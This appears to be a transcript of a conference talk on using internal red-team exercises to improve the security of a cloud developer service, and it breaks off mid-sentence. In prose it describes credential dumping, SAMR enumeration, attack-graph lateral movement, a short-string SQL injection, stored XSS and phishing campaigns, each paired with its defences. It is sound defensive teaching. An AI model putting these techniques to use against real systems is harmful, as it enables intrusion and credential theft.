 Thanks for joining me. So I'm going to talk about security today. I'm Buck Hodges, director of engineering for visual CO team services, and a lot of security talk can be very dry, very boring. I want to change that. So we'll start with, what's a security conversation look like normally? Because one of the biggest challenges, and this is sort of my whole crux here, biggest challenge with security, isn't actually doing it so often as much as it is convincing people to go do it. And so this is the problem we're going to talk about today. So how many of you have been involved in these kind of conversations? Well, how real is that threat? Our team is good, right? I don't think that's possible. We've never been breached. Can't be a problem, right? Endless debate about value. Should I go invest in security? Should I work on features? I should ship more features, right? So how do we deal with that conversation? How do we change the game there? And so my whole talk here is about shifting the conversation from a debate about the value of it to a concrete conversation about where to invest and how. So we'll start here with this quote from Michael Hayden, who was former director of NSA and CIA. And he says, fundamentally, if somebody wants to get in, they're getting in, accept that. What we tell clients is, number one, you're in the fight whether you thought you were or not. Number two, you're almost certainly penetrated. And this is a pretty stark statement here is you're going to get breached. What are you going to do about it? So to start with here, there's a mindset shift. There's sort of too many things here, right? There's preventing a breach and there's assuming a breach will happen. The prevent breach has threat modeling in it, code of view, kind of all the things that you've heard about and know you should do. And they're very valuable. They're very valuable activities. At the same time, they're not enough because the thing with an attacker is an attacker only has to get a few things right to get in. You have to get everything right to keep them out. It's a very asymmetric balance in the equation there. So the mindset of assuming breach is really about thinking about, all right, if it's going to happen, am I prepared? How do I deal with that? How do I detect that I'm being attacked? How do I handle it if something does happen? What's my response plan? What am I going to do when it happens? How do I recover? All these questions that, you know, if I don't have some means of dealing with this becomes really panic in an emergency. Part of this too is ongoing life sight testing of your response mechanisms. So let's say you've done some security. Today you've got alerting on, hey, when something happens, this alert's supposed to fire. These people are supposed to do something. We have that too. We started testing this. We'd go do stuff that would trigger alerts. Three days later, we'd get an email. Huh, that didn't work too well, did it? Right? So do you really know whether or not your detection mechanisms are actually going to help you? Are they going to respond fast enough? And then when you think about attacks, once the attacker gets in, what do they have access to? Security is something where it's all about layers. And people often think, hey, if I'm on corporate net, if I'm on my corporate network, if I'm inside my firewall, I'm safe. And that becomes an attacker's greatest dream because once they get through your first layer defense, everything else is just awesome, right? How many, how many internal websites have you seen that have major security flaws because they all assumed, hey, this is safe. I mean, I'm inside the corporate firewall. I don't think too hard about it. And then as part of this, you need to think about once you run, and we're going to talk about running exercises here around breaches, what's your assessment afterwards? How do you react afterwards? What do you do? So the first thing is the shift in mindset. Many people, and us included, right? I spent this whole time talking about TFS, the on print product, we moved to the cloud. When you're on prem, you've got a server, you got domain admins, you got private IP addresses, you're not exposed to the internet. Then you start running services and it all shifts, right? You go from thinking about domains to thinking about subscriptions, who's got access to your subscription? How do you manage those secrets? You've got a bunch of IP addresses for endpoints for your various services that are online. How do you deal with that? And this is where we do something internally, and a lot of other companies do as well, called red versus blue, red teams and blue teams. And this is key to changing the whole conversation around security. So what is red versus blue? Red versus blue literally means you spin up a team, a red team that goes and attacks your service. And you have a blue team whose whole goal is to detect and thwart the attackers. And forming a red team, we'll talk a little bit about what that looks like. But it's really about taking either external people or internal people. And quite honestly, I think, you know, certainly early on, ideal combination is to have both is to pair external penetration testers with people in your team. Because the most interesting attacks require knowledge of your service. You know, people can scan, rig and run scan tools, those are valuable. They'll find things like let's say the serialization vulnerability or something. All good stuff. You go fix it. But the most interesting attacks string together multiple issues. And those are best identified by people who are deep into the system who really understand it well. So red versus blue, you have an actual event where you've got a set of people who will go attack your system. And that could be a week, it could be months, you know, there are any number of ways you can structure it. Typically, we do a few days to a week for an event. And then the blue team, meanwhile, is trying to figure out what's happening. They're monitoring now early on when we started, we really had a blue team spun up to go look at the system while the red team was attacking. But how often did attackers warn you ahead of time, say, Hey, get ready. You know, they don't. Now, early on, when we started this, we were so bad at it that we could tell the blue team that was happening. It didn't really matter. They were screwed. So the key is key for them. Blue team is a character building exercise. So it's really starting to think about, okay, the red team did something. So often early on, you find out later what they did doing the forensics and then asking yourself, they did these things. Can we tell what they did? Do we understand what impact they really had? How do we detect them? And it takes years, and I'll show you the progression, but it took a long time. Now, I love these things. I love security. I love red team events. They're so fascinating because the creativity that people will apply to break into services has no limit, has no limit. It's fantastic. And it's also mindset where these are people who don't see rules. So often engineers and developers, when they write a piece of code, they think about how it should work. The attacker thinks about everything, but the right way for it to work, right? So when you run these events and they run across Microsoft, this is not at all unique to us, but I always require proof. I want to see, can you prove to me that you got in? And we'll talk about the rules and engagement for a moment in a minute, but this is MSNJ. What do you notice is happening here? I go to the main dashboard and it rotates upside down, but I won't prove. Again, I want to change the conversation. I can come talk to you about what might be possible, but if I show you something like that, if you click on your homepage and it rotates on you, I got your attention, right? So the red teams also are very clever. Again, they're creative people. Every time somebody clicked on the MSNJ homepage when they had exploited this particular vulnerability, which happened to be a cross-site scripting error of vulnerability, they wired it up so that when you viewed the dashboard, it voted on the work item to go fix this vulnerability. It had 280 votes to go fix this vulnerability. Somewhere, there's a persistent cross-site scripting error of vulnerability, somewhere in VSTS. It was really, really clever, but I demand proof. Don't tell me what you might have been able to do. Show me what you did. So here's kind of the evolution for us of red versus blue. Before we started it, we did a variety of things to try to improve security. And it's not that we were doing a bad job. It's just you can always get better. And this is one of the things that in my mind has really shifted and improved our security posture more than anything else that we've done. But we would identify, and we still do, identify vulnerabilities through manual code review. It's a good exercise. We had engaged an external PIN testing company and they came and they did stuff and they gave us a report and there were a few things in there to go fix and it was interesting but it wasn't super interesting. There is only but so much you're going to get out of scans and there are a variety of tools that you can go either purchase of services or buy outright or whatever to use to do scanning. They're viable. You should do it. But it's kind of, it's really getting started. That's not the interesting stuff in a lot of cases. And it's just kind of the basics. So we engaged the external PIN testing company. We would also do report outs to the team and this, by the way, is really key. And we do this all the time now. We in fact did our latest red team report a couple of weeks ago. When you go have the conversation with the team and you show them what you've broken in their code. So if I come to you and I say, hey, here's this interesting vulnerability in, I don't know, Internet Explorer or whatever, and you go, ha, those guys are stupid. I can't believe they did that. That would never happen to me, right? It's very easy as a human to dismiss it because your ego is saying, yeah, it wouldn't happen to me. But when I come to you and I present, I broke your code. Here's how I got into your code. It changes your mindset. And the result of these red team events has been people will actually make statements. I love it every time I hear one in the hallway. Yeah, I don't want to show up in the next red team event, right? I don't want my code being there because we all know that some of you are probably familiar with threat modeling. It's in the presentation. I won't get it to it today, but you can look at it in the slides. But threat modeling is a great exercise, but you tend to only do it when you design new features. Everybody knows, of course, you can introduce a massive vulnerability with a single line of code change. It's happened to us years and years ago. Somebody modified a code path on where we evaluate the tokens, the JWT, the JOLT tokens, that we use for authentication. They thought they were modifying code path that was only used in testing. They took out the signature validation. Turns out they took it out for everything. That was terrible. It was a one-mind change. Change the Boolean variable and introduce a massive vulnerability. So I want people to think about security all the time. Every time they write a line of code, I want that in their heads. I can't mandate doing threat models or any other, you know, big process around just making a line of code a change, changing a line of code. Never get anything done. But if I've got it in your head, then you're going to do a better job inherently than if it's not on your mind. Part of those earlier exercises helped us identify two people who kind of think creatively. One of the coolest things that happened, by the way, in the pre-Red Team days, one of engineers decided, hey, I think I could make use of the fact that .NET and SQL treat strings differently. That, say, a Cyrillic Bardot is a Cyrillic character. The weighting of it in string comparisons, if you haven't set up your parameters correctly, is different between .NET and SQL. He was able to take that small little fact, and he had a, he demonstrated, he wrote a PowerShell script. He could go from being a guest and just regular user in account to a deployment admin by exploiting that vulnerability. And this was four or five years ago now. But it's that level of creative thinking about just what are the differences? How do I do that? So there were a few people on the team who kind of had this kind of mindset of they like to break things, and those are the people that you want to find in your company and pair them up with external pen testers who will bring into your team knowledge of how to go about pen testing, be it tools, be it processes, be it mindset, and you can really cross-pollinate between the people who understand and know how to do pen testing in general and the people on your team who could think creatively but also deeply know your code. They know where the body is buried. They know the interesting stuff to go after. And then we'd also, as we started this in 2015, as we hired a pen tester who was actually really good, came very, came recommended. We paired up some sort of ops minded engineers to become the blue team, and this is early on, so you could warn the blue team, and like I say, unfortunately it didn't matter at the time. They couldn't find the red team. And the attacks start off with things that are just truly embarrassing, and I'll show you some of those, where secrets are poorly protected. How many people have ever put a secret on a share, on a file share, right? You think, oh man, I'll never do that, that's the stupidest thing ever. Every team at Microsoft that goes through and does red teaming, the red team goes and scans file shares and they inevitably find secrets. So if you do it, you will find them in your company. They also found SQL injection. One of the SQL injection vulnerabilities they found over time was actually pretty cool. We go to great lengths to prevent SQL injection vulnerabilities. I talked in the architecture talk about having a SQL resource component layer that we use, where everything goes through. We use stored prox, we almost never build dynamic SQL, almost. Well, there was that time when somebody got it wrong, and there was 38 characters that you could make use of for SQL injection. And the red team couldn't figure it out, so they went to the best SQL engineer on the team and said, we've got these 38 characters, can you come up with a way to do SQL injection? And he did. He figured out that he could use that to upload data into a temp table. And so 38 characters at a time, he could write a new SQL string into a temp table. And at the time, we changed this, you could execute SQL straight out of a temp table. So after he uploaded it, he executed the SQL in the temp table, boom, they owned us. And he actually could have done it in fewer characters, he didn't need all 38. So, but that's that level of creativity. They spotted a little bit of a hole, they found the right expert, and they figured it out. So going through these exercises, this was really for us kind of a a major milestone, a real shift in how we approach security. So we were actively going and finding and attacking finding problems and attacking our own service. We also started using phishing campaigns. We do tests, and I'll show you some results of that. Phishing is amazing. Like, okay, you find a zero day, you've got time to use it until somebody patches it. But there was somebody who was joking online, you know, teach man to fish, he can get in forever. Phishing is just so phenomenally successful, and it changes what you have to do to protect yourself. And we'll talk a little bit about that later. So then in 2016, we further augmented the team with outside experts, meaning other red team members across the company. So Windows has a red team, Office 365 has a red team, Azure has a red team, IT has a red team, they're really good, they're very smart people. Anywhere you can start leveraging other people, you should do it. So we started borrowing, begging, hey, could we have one of your people for three days? And they were very nice, they would lend us somebody for three days. And what was interesting about that is we learned new techniques that way, just like with the external folks, with the internal folks, we also learned new ways to do things. They introduced introduced us to new tools, new ways to think about things. And at that time, we were thinking about things like cross-site scripting, the engineering system itself, deserialization vulnerabilities, some really creative ones that involve some of the features in the product that I won't go into. But that was also the time when we started really thinking hard about how do we, how do we stop losing? Like the red team always wins, how do we change this equation? So we spent a lot of time thinking about logging, thinking about what else we could do for post-breach forensics. Because when they break in, do you really know what they did? And 2017, we've improved quite a bit. It's now, it takes the red team a lot longer to get in. And you go, yeah, but you still lose. You're right, still lose. Still sucks that way. But you can see a clear progression in the effort that it takes over the years. It's so much better now than it was then. You're never done with security. It's never perfect. But what's interesting is you look at all this, and I'll tell you about Clipso here in a minute, but this changed the equation. So when we did our first red team attack back in 2015, we found credentials on shares, some crazy stuff like that. And when Brian found out about it, Brian's head exploded. It's like, what? What kind of idiot does that? Let's fire those people. So it elicits a very strong response. And then, of course, he calms down and starts thinking about it. And then we talk about, okay, everybody kind of goes through this, etc. But at that point, I got his buy-in too. And he sees the value of it. The whole conversation here around security is so often this trade-off of, do I invest in security or do I go do features? How do I balance this? And too often, people who worry about security come across as, oh, you're overly pessimistic, you worry about something that will never happen. It's never happened before. You know, this is all these questions I had on that first slide. Red versus blue really changes that whole conversation. It makes this very concrete, shows you what's possible. Calypso monitors are interesting because Calypso is a service that you can essentially think of today as a scheduler. It's basically running queries in Kusto, Azure Log Analytics, running queries in Azure Log Analytics. And it's running queries where you expect to get zero results. So I'll give you an example of one that we've created. If you were to able to remotely exploit a bug in anything, be it our code, be it Windows, be it whatever, and let's say that as part of that exploit, you're going to run PowerShell, encoded PowerShell. It's a popular thing to do. Run encoded PowerShell so you get a foot in the door, and you've got basically a back door running at that point. Well, we have a Calypso alert that if you attempt to run PowerShell on the machine, if you attempt to run encoded PowerShell, we'll get an alert, and it will actually show up as an incident, and we'll immediately engage. We didn't have that. I mean, there were events that we had in 2015 and 2016 where people would go in and they'd actually get into a machine because they'd run, they'd find some clever way to get in, and they'd put something on the machine and we didn't detect it. And so we've come a long ways in that detection. The Calypso isn't something that we ship yet, it's something that we're actually talking to the application insights team about making it a product, about pulling it in. I hope that happens, but at a minimum it's something, if you wanted to, you could actually mimic yourselves, but hopefully it becomes part of the product over time. So part of this question always comes back to, well, has this been effective? What's been the outcome? After every one of these events, we go file a bunch of repair items. So just like you would do for LifeSite, you do an RCA, you do LifeSite repair items, we have repair items for security. Over the course of the last three years, we filed 226 repair items, and we have an SLA around it. We require that these are fixed within two sprints. Now if it's a vulnerability that you can actively exploit, obviously we go fix it immediately. So there's a whole spectrum here, right? But going back to defense in depth, when you look at the chain of how the red team got in, we'll fix the key ones immediately. There are other things that could be used by somebody else, but by themselves you can't use them for anything. Those become these work items that we then go follow upon. But we've generated a lot of interesting repair items as a result of these events. It's a crude metric, but it's a way of measuring the effectiveness of these. All right, so guidelines. Now if you're going to do red teaming, and I highly recommend it, I think like I say it changes the conversation. But you've got to be smart about it. So you've got to have some rules to the game here. And I like to have as few rules as possible, because real attackers don't play by the rules. They don't care what your rules are. But we run a business, there are some things you can't do. So for example, we don't want the red team or the blue team, but generally speaking the red team to do any harm. Because we run a service. The last thing I'd want to have to do is apologize to you, our customers, and say sorry, we took you down today because we were just running an internal event to see if we were secure. That's not good. Don't compromise anything more than you need to achieve your objective. They have to actually think about things like how they're compromising the service because they often will collect credentials along the way. Like if they break in and steal the connection string to a database, that's a valuable piece of data, right? So they have to protect the data that they collect as well. And that's a key part of the whole thing is making sure you don't do things like that. We also make it off limits to harass people. You know, you can't go do physical intimidation. You can't go steal somebody's badge. There are limits to things to avoid problems. Rules of engagement. Again, I don't want to take anybody down in these things. I don't want to access any customer data. Customer data is incredibly valuable to us. It's a sacrosanct. Like you can't go mess with people's data. You can mess with our data. And that's why I wrote external data, customer data. If you want to go mess with the data in MSNJ, you're able to do that. Now, I'd ask the red team and I'd say, please don't take us down for a week. Right? I got to get stuff done. But if they want to go access data in MSNJ, have at it. It's our data. It's okay. But not external customer data. Make sure they don't weaken the protections. Like they're going to find issues. They may even make changes that make things weaker. But they have to think hard about making sure they don't actually allow, make the system more vulnerable than it already is. Again, don't do anything destructive. So it takes me a long time to recover. And as they pick up these interesting and secret credentials, be careful how they store them. So what comes out of it? Two things. That backlog of repair items, the 226 that I showed you in the previous table, and that report, that readout to the entire organization. Those meetings are always very well attended. They're always interesting because everybody wants to know what did they break into. It's, they're just fantastic. So let's take an example. So what does an unprotected share look like? Well, okay. In this case, it's the most extreme version. It's open to everyone, right? So what could go wrong there? Well, somebody created some share because this was convenient. And they put a file that looked like this there. And this really happened. So this is not the actual file, but it's close enough so you get the idea. And those accounts, there are test accounts. Anything. Who cares? It's a test system. Nobody cares about a test system. Well, both our red team and other red teams in the company have found ways to, somebody writes a piece of code and they trust a test domain where they trust some other service that isn't, that doesn't have the same security level as production. And domain names are great for this, right? So like if you've got some test domain names and you go and create, because anybody can control them, you go create a service running on your box under that domain name. If production trusts that, bad things start to happen. Let's say you might say exchange tokens for service principles or something. Those are very, very deadly things. Test accounts are something that look innocuous that are not. So they start looking for stuff and they find credentials like this. And as I mentioned before, every team seems to experience this. And by the way, there have been incidents where non-test credentials, right? Things that have access to certain things in production have actually been found this way. It's bad. But it happens and you've got to start somewhere. So the first thing to do, of course, is acknowledge that you have a problem. People have checked in credentials in a code. I've again picked a test example. It's actually happened with production code. It's actually happened. There are actually people who run scans on GitHub looking for keys for AWS and for Azure so they can go run their spam bots so they can run Bitcoin miners, etc. Great thing about having a search feature in GitHub, by the way, had to change this. Great thing about having a search feature is that you can use it to search for anything in your code, including credentials. They actually changed it to make it harder to use your own search service to find them. But here we've got a key that's been embedded in code. What do we do about that? Well, one thing you can use and this is currently internal but the team that owns it is actually working on shipping this. So here in the coming months this will become publicly available. But there's a tool called CredScan or Credential Scanner that will scan for patterns that resemble connection strings, passwords, etc. It's all based on regular expressions. They keep adding more and more regular expressions so it's become very good. And we've mandated across the company that you have to run this. So then there's another interesting challenge that this team is actually already dealing with now which is how do you get this inserted into all the build definitions, right? Because in order for it to run it's got to be part of your build for being part of your build pipeline. You can also use the same tool, by the way, to scan, and shares, right? You feed it files off disk, great. It doesn't matter what the file is. It can be code, it can be files off a share. Very, very valuable for that too. And so it runs as part of the build and I'll show you an output from that and uses these regular expressions to identify things. Now they're going to be false errors, right? They're going to be hits that it discovers that aren't actually a problem. You can go annotate those in your code and say, no, no, no, this isn't real. But the hit rate is so good. It's extremely valuable. It's very much worth it. So here's an example of it showing up in the code. And this, this same piece of test code got checked in, let's say. And this build, we call it the compliance cred skin build. And you can see here down at the bottom that it points out those errors. And this build is actually part of our PR. So in, I think in Bill Estry's talk, he may have shown you a PR screenshot. In there was a run of cred scan. If cred scan fails, you cannot push your code. It's that important. Another piece that that I mentioned here is you've got credentials on shares. You've got credentials kind of scattered in various places. How do you properly manage those? We have now moved everything over to Azure Key Vault. We used to use something that was an internal service, thankfully. There's, there's now a public service. It works really well. We've, we've moved entirely to it. Everybody else is moving to it as well. And this is where we store passwords, keys, tokens, storage account keys, certificates, you know, kind of you name it, whatever it is, we store it there. But we also store our test credentials there. Now, there's a different access level. If you want to get to production, right, me, I can't go get the production secrets. I literally don't have permission to the production secrets for VSTS. That's a good thing. If you steal my identity, I don't want you to be able to use me to get there. But test credentials, lots of people are going to have access to those. That's the nature of the beast, right? You've got to be able to run tests. But since they're in Key Vault, A, we know exactly what they are, B, we know where they are, and C, when we go to rotate them, it's easy to figure out how to change them. We can go to the source, we can go change them in Key Vault, and the changes propagate immediately. So it's important to have everything in there. And you can define different vaults. We've got a whole hierarchy of vaults. We've got, in the case of the production service, runtime vaults, deployment vaults, everything in there so that we can properly manage the secrets. And of course, with anything like this, some of them expire, you've got a certificate, let's say, for an SSL cert. It has an expiration. You want to make sure, of course, you renew it before it expires. So Key Vault helps manage all of this, and I highly recommend it. So let's go back to another example, Red Team Attack. So there's a way to list, you can see, of course, administrators on your local machine. You can bring that up in Windows. And well, what could you do about this? What if you had a tool that if you run this tool, and maybe some of you heard of this tool, it's called MemeCats. It's a great tool. If I'm admin on a box, and I run MemeCats, I get to steal your credentials. So it was written by this French researcher. It runs in all versions of Windows, with the exception of Windows 10 Enterprise. You can actually turn on Credential Guard to thwart this. Absent that, when you run it, it'll actually go extract credentials out of memory. And you just have to have debug privilege, system account. You got to be local admin. Fine. So what could you do with this? This seems like a great little tool. You know, if I got admin to somebody's machine, I can go steal their credentials. So here's an example of an attack. Start with an open file share. We find some plain text credentials. We find some developer box where those credentials are admin. I run MemeCats. I now have those credentials. I now find the next computer that person has access to. And I keep repeating it until I've collected as many credentials as I need to get to my ultimate objective, which of course is to get into production or whatever. But I can keep repeating this over and over again. So the next thing you want to know is which machines can I get into? You're not obviously going to go right-click in Windows and list local administrator. That's way too painful. Turns out Windows helps you a lot. There's this thing called SAMR, which is a security account manager remote query. And you can use that to list out who the local admins are. Now the great news here by the way, punchline is, they did turn this off by default in Windows 10 anniversary update. That was Redstone 1, which is great because what happened is attackers will use that capability to go build an attack graph so that they can figure out how to get from one machine to the next to their ultimate destination. There's something you have and there's something you want and if you can map out all the possibilities of getting from point A to point B, you can then figure out the most efficient way to get there. So there's a tool out there you can look it up it's on GitHub I got the link in the notes but it's called Bloodhound and it can take this data from Active Directory and SAMR and go figure out who's got access to what machine and so as you find credentials as you pick them up off file shares or wherever or you run memocats and steal them now you can go ask okay I've got these credentials where can I go with that and of course if you think about it in a holistic manner you're really going to think how do I get to that destination so you're trying to get to your destination as in as few hops as possible so it results in something like this so let's say I've got my machine and let's say that I'm crazy enough to have the test account be admin on it and this has happened in the past not to me so but you go get into my machine because you've stole the test account credentials and it's a test account seems harmless enough right but people would make it admin on their box because it made at the time easier to run tests so I go run memocats okay not me you and you get my credentials then you go to the next machine test SVR1 you sit on that you run memocats you steal Alice's credentials Alice it turns out has production access oh now I'm in business I got something I can really party with but you can also run it from the command line you can see what it does if you run group manager from the command line you can list out the admins and this this is exactly what SAMR allows you to do but like I said the good news is you got turned off on Windows 10 anniversary update by default is a group policy you can be re-enabled of course if you're not running Windows 10 at all you're vulnerable as I was talking through that I alluded to one of the most important things that's so key in a mindset shift here Defender's thinking list this is from John Lambert who is the Microsoft threat something center I forget what it stands for security guy he's very important security guy at the company we just got so many acronyms I can't remember all of them so it says Defender's thinking lists attackers thinking graphs as long as this is true attackers win because at the end of the day the attacker is just trying to achieve an objective how the attacker does it is irrelevant like they don't care how they just want to find a way that gets them through it and if you think oh well okay I've got the following things and you think in terms of what your code does and how it works you're going to lose you have to look at all the options here's an actual example it's been a little redacted but this is from a real attack the red team ran a while back and they did exactly what we've just been talking about they got credentials and they hopped from machine to machine so they started up here on the left they found the credentials to a test account they found a dev box where it was admin they then found a dual home to machine that got them to some interesting boxes that have access to production and they won they took over the service the other thing to think about here is attackers have also changed their playbook they're not necessarily looking to go hit you with malware right phishing attacks are one of the most effective ways that you can attack someone and you see in here it says this is the the fourth circle over the the first second circle from the right says of recipients opening open phishing messages 11% click on attachments so really what I need to do is I just need to trick you in to let me in the door how hard could this be or how easy could this be so we run internal phishing attacks and so this one I'm going to show you a couple that we did in our team but they're done across the company and there are actual companies and I forget the names of them but they're actually companies that you can use to help help you run phishing attacks on your own company because you need to get telemetry on how effective it was and who did it and so forth so here we ran a phishing attack this looks like a pretty stupid message like surely nobody would click on this right it says it came from a printer of course we all all know these fancy internet connected printers right great seems harmless enough maybe you scan something recently so you decide to click on it well 19 percent of people decided to click on this in our team this is from a few years ago this was two and a half years ago all right because this was May of 2015 10 percent of people reported it now I'm sorry 10 people reported it 2 percent not a not a great ratio is it let's look at a better one let's do a better one so the ran the same attack again the same same time again May two phishing attacks back to back so back in May of 2015 Windows phones were a little bit more relevant than they are now so this was hey we're going to build this brand new Lumia for Windows 10 you could get in on this 220 people 42 percent click sign up 37 percent 37 people clicked on the last email I showed you and this one and only 11 people reported this one to security and the awesome thing here is it has this availability of beta persistence is extremely limited this email must not be forwarded to others guess what happened not only did they use it they shared it with people so and it's funny and it's sad and you watch the news phishing is the best way to get into any company on the planet so I'm kind of going back to what can I do if I've got somebody's credentials can they send email great I can fish other people what machines do they have access to we've been through that example can they modify source code wait I just stole the devs credentials I could go find the machine that has access to production but why not just inject some code and put in a back door okay if if they can if you've got the way to check in you could do that can you modify the releases hmm I could modify the release definition I could have it run an arbitrary script that could be interesting can they access the test environment as I was mentioning before if production tests anything that test owns test is of course not held the same security standards production if anything in production test something that's less protected less maintained from a security perspective you may be dead you may get owned and then can the the credentials that I stole can they get into a production environment that could be azure resources could be subscriptions azure subscriptions could be storage accounts could be any number of things so thinking about blue team response here what does this look like from the blue team perspective and the variety of pieces here so we've got the azure key vault so this could include the the test credentials for example getting all those together into a single place is a huge improvement so this was this was as a result of of a red team events we realized just how poorly at one point we had managed credentials we fixed that remove local admins every every admin on the box is another opportunity for somebody to get in restricting SAMR so before it was all by default in in Windows 10 we'd go around and turn it off on machines you can do that in in prior versions of Windows and I'd highly recommend it we we actually put a check in the build process at the PR and said hey if the build environment so so when you spin up a build environment I think Bill Esri talked maybe a little bit about this but you spin up your your your dev environment one of the things we check for is are you running Windows 10 Enterprise or Windows Server 2016 and have credential guard turned on if you're not we go poke you and and to get you to do that now one of the great things about most of the people having the same type of machine as it becomes much easier to get people to turn it on so pretty much every engineer okay literally every engineer has an HP 440 Z440 with a six core machine so they're all the same so it becomes much easier to get people to turn this on but credential guard keeps MemeCats from working remove dual home servers you'll remember in that graph that I showed you the real attack they jumped onto a dual home server the great thing about dual home servers you've got access to two things right all the all the better and so anytime you've got a machine that that is able to access more stuff more problems separate subscriptions so every service should have its own Azure subscription its own storage et cetera so that if you compromise one you haven't compromised them all to limit the blast radius multi-factor authentication or 2FA super important if I get your credentials and if there's no 2FA challenge for whatever it is that I can do is you well I can do that I'm you I've got your credentials if I have a 2FA challenge in the mix then it slows me down it may stop me hopefully stop me and you could combine that for example with a just-in-time access system where you say okay if you want to get access to production SQL you've got to go through and request it you're going to go through a 2FA challenge and then you're only able to access it for some period of time question so in production how many Azure subscriptions does VSTS use good question I meant to go collect those stats and I didn't but it's a bunch it's whether it's 40 microservices we heard yesterday is it in that neighborhood yeah 30 31 services I'd have to go look I don't remember but it's not but there are 192 scale units right so with separate subscriptions per scale unit you're at 192 there and then you've got the storage accounts and that's separate so it multiplies out pretty fast and I meant to go get the stats on how many secrets we have in Key Vault I don't think I have I don't think I ever yeah I didn't ask for those unfortunately but it's it's a lot it's probably if I had to guess I would say all up we probably have something on the order of close to 2000 secrets of some form or another passwords certificates subscriptions you name it separate identity for production buck oh sorry where how do you protect the Azure Key Vault because to be able to access it you have to have a key so yeah so normally what happens is the only thing that can access the Key Vault for the keys that are in it is production now to rotate them and you know they're two pieces one is I want to automate all the secret rotation that I can possibly automate there are a few things that can't yet be automated because of whatever the thing is the dependency is the team that owns it hasn't fixed that there are a few kind of external to us that I really want but there are very few at this point so I want to enable automatic rotation so there's something that's changing those secrets for us and not in this production itself doing it so what we did is this we actually wanted to get good at secret rotation for a long time it was a very manual effort so somebody from the service delivery team a small number of people would have access to the production secrets and they would have to manually go run various scripts and do various things to change the secret from one thing to the next starting about a year ago we put a lot of effort into automating secret rotation first step there was you know to get everything fixed so that it could happen and while we use a common server framework and that helps us a ton there were still enough differences in the team that it was an effort to get there the next thing we did was said if you want to be good at something do it all the time so we've actually changed our deployment so that every time we do a deployment we rotate all these secrets that we can rotate automatically and that allows us to make sure that we keep it going all the time because it's certainly going back to a breach response if when credentials are leaked and by the way this was much more painful in the early days red team would go through they take over the service they steal a bunch of credentials and it would take us three three or four weeks to rotate all the credentials because it was so darn painful because it was too manual every time you've got manual rotation of secrets it's like anything else in deployment you have the opportunity to get it wrong and we have we've had people get it wrong we've had live sites incidents caused by somebody trying to rotate secrets manually and getting it wrong so we've invested a lot in automating that and like I say folding it into the the deployment process so that every time we deploy we do a secret rotation so we're not quite exactly where I want to be I want to literally be able to tell you we can automate every single one of them I've got a very small number that I can't right now and I want to I want to get that fixed too of course question so since these practices have been there for a while were there any considerable design changes at the application level that were made because most of these as I see over here are kind of infrastructure related the application level changes so that's the first question the second question is can you now detect these attacks in real time can you monitor them yes or no and if you can are there any circuit breakers stop gates that have been implemented to ensure that they can only get a certain set of information and not more okay so start with the first one which was architectural changes as a result of this there have been so for example we have these 31 microservices they all communicate with SPS for example with a service principle as part of these red team attacks we realized we had granted too much access to some of these service principles so we went back and set it up so that in the security service it's locked down where if you get a service principle let's say for code search you can't go and start deleting accounts from SPS it doesn't have permission and there's no way you can change that permission so we started locking down the principle of least privilege right the least privilege required for each of the service principles to actually do what's required same thing with the SQL injection vulnerability story I was telling earlier we had not even thought about oh well you know if you put SQL in an attempt table should you be able to execute that? okay yeah no that's a bad idea turn that off we don't need that feature so part of it part of it's thinking through features in our dependencies that we could turn off part of it is changing the code itself we've made other changes related to particularly inner service communication we've found issues where we were able to bypass certain security checks and that's caused us to go back for example to our REST controllers and change how they work in order to improve the resiliency there to the security checks so there have been things like that but they tend to they also tend to be more involved and kind of very specific to our code the second question you have remind me what the question was can you now monitor detect these attacks real time and if you can do you have any stop gates or circuit breakers to stop the attack so the answer is yes and no so if you were asking this question to your god say no we've never actually managed to successfully do a good job detecting these and why I say never managed to successfully do a good job when we started doing red team attacks they weren't very careful by design like they would intentionally do stuff that if we had detection in place they would have been caught and we all know a good attacker tries very hard not to be caught they cover up their footprints they try not to do anything that looks wrong they would not for example create a local account on a VM that happens to be named after a certain nation state that might be in the news so they were doing things that were kind of trying to be obvious and we still wouldn't find them at one point they even left notepad up with some ASCII art on one of the VMs that was kind of cool so we were bad at it fast forward to 2017 Calypso for us was sort of the biggest game changer because what it's allowed us to do is in production we run azure security pack which you can get to as azure security center externally we also have all these this information flowing back in the form of the various events and windows so if somebody for example creates a local account on a VM we're going to alert for we'll know that but going deeper than that and actually this is my next slide maybe I should flip to the next slide so with Calypso we can detect things like people trying to run encoded power shell in this particular case somebody was actually able to make use of SignalR and they triggered the exploit they were doing it through a browser and they were able to do certain things but we actually wrote an alert here this is using Calypso so Calypso is just running azure log analytics queries on a schedule so every five minutes and they'd run this and we could detect okay somebody's trying to do something funny with SignalR there are a variety of these that we've we've come up with some around network connectivity a variety of things and we're constantly trying to come up with new ones to detect red team activity now the thing that we struggle the most with and I think everybody does is detecting the difference between legitimate and illegitimate access so if I steal your credentials and you're an engineer on my team but as in it I've kind of blurred the lines here let's say you're an engineer on my team and another attacker takes your credentials how can I tell the difference between you and this person who's impersonating you that's actually very difficult and I don't have a good answer for that one because then then I'm looking for things like okay she's modifying code that she doesn't normally touch or she's using a machine that's in Singapore and and she and Redmond you know or she's doing it three in the morning and she should be asleep like you're looking for signals like that to try to figure out something that should be normal you doing development that is no longer normal that is still a work in progress question so what's the impact of the monitoring on the live site teams or is it a separate team or how is that handled and what's the actionable takeaway from this for for clients okay so the monitoring is the same monitoring so when let's say Calypso here we run some query and we find there's something suspicious it's actually going to generate an alert that goes through the same incident management system that other life side alerts go to so if if we're breaching SLA if we've got an availability problem it generates an alert the same alerting mechanism is used for security it's just the particular incident is about security instead of availability or whatever the particular problem might be so it's the same thing it's the same service delivery team it's the same on-call DRI rotation everything's the same once it happens we may in fact pull different people in to do different things as a result of reacting to whatever this issue is and quite honestly by the way you know I mentioned other red teams in the company do events they sometimes attack us the Azure red team did an event back in the spring and we caught them with one of these queries so but it comes up through the same incident management system that we use for everything else but you have a dedicated response team that once something's occurring you have good question so the company has people who specialize in handling security incidents and they work on this across the company for Azure for office etc and so if an incident happens then we go look at it and we'll go pull in those those people so the security incident response team CSERP CSIRP I forget what the CES but anyway but the incident response team we go contact them we pull them in and then it becomes a quick evaluation of okay what's actually happening is it real is it not real right is it a red team or an external attacker and then from there it's a matter of reacting based on what's happening right what are they doing it could be any number of things and that will determine the response but yeah there are central teams in in Microsoft because and the other thing that can happen and we had this happen once this was actually back in the spring somebody on Twitter claimed that they have found a way to breach VSTS that was a new experience for us we didn't do a particularly good job handling it we changed some of our procedures as a result but they posted an image that was redacted claiming hey we found a way to get into your system by way of profile it turns out they were wrong which is you know okay good but the fact that they were able that they did this and that we didn't 